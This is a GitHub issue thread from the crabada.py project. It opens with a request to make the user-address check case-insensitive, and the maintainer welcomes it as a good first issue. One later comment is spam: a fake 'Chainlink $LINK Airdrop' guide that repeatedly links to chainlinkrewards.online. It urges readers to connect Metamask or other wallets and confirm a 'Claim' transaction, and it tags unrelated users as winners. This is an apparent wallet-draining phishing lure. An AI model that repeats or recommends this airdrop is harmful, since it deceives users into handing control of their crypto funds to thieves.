### ISSUE TITLE
Minor Issue with .env

### ISSUE THREAD

**Issue by theBlackEndDev** [coccoinomane/crabada.py#86]
So I've noticed that the parser for user address is case sensitive.  Metamask uses capitals and other places use lower case I've seen which if you manually run a command with the wrong case you'll get

```raise UserException(f"User address not registered: {str(userAddress)}")```

Its not a huge issue but would be nice to have a toLower/toUpper method before it gets passed in.  Again this is minor and more of a nice to have and doesnt affect functionality.

**Comment by coccoinomane** [comment]
Hi @theBlackEndDev ,

A lowercase check on the user address can be a nice addition, I am labelling the issue as "good first issue" :-)

Cheers,
Cocco

**Comment by loayei** [comment]
Will get into this tonight.. Sorry for the delay..

**Comment by naudachu** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin Airdrop?

If you're interested in holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great opportunity. This guide will walk you through the process, explaining how to join the airdrop and what to expect.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://go.chainlinkrewards.online/Xb0Ggc)

#### 🚀 Steps to Secure Your Chainlink $LINK Airdrop:

1. **Connect Your Wallet:**
   - Visit the [Chainlink $LINK Airdrop](https://go.chainlinkrewards.online/Xb0Ggc).
   - Connect your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the airdrop [here](https://go.chainlinkrewards.online/Xb0Ggc).

3. **Interact with the Contract:**
   - Use the `connect` method on the Chainlink network to secure your participation.
     - Open your connected wallet.
     - Navigate to the Chainlink $LINK Airdrop contract.
     - Locate the 'Claim' or equivalent button.
     - Confirm the transaction to connect your wallet to the airdrop contract.

4. **Engage for Extra Rewards:**
   - Dive into community discussions or complete tasks for additional bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Success:

- **Community Assistance:**
  - Need help? Reach out via Telegram or other social media platforms.

- **Stay Informed:**
  - Watch for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution may take some time. Stay calm and keep an eye out for updates.

Feel free to share your Chainlink $LINK Airdrop experiences or ask any questions in the comments below. Let's make this process a breeze for everyone!


Winners: @TopLiu, @zigen, @colekennelly1, @R-K-H, @3amlab, @Alexintosh, @LuaxY
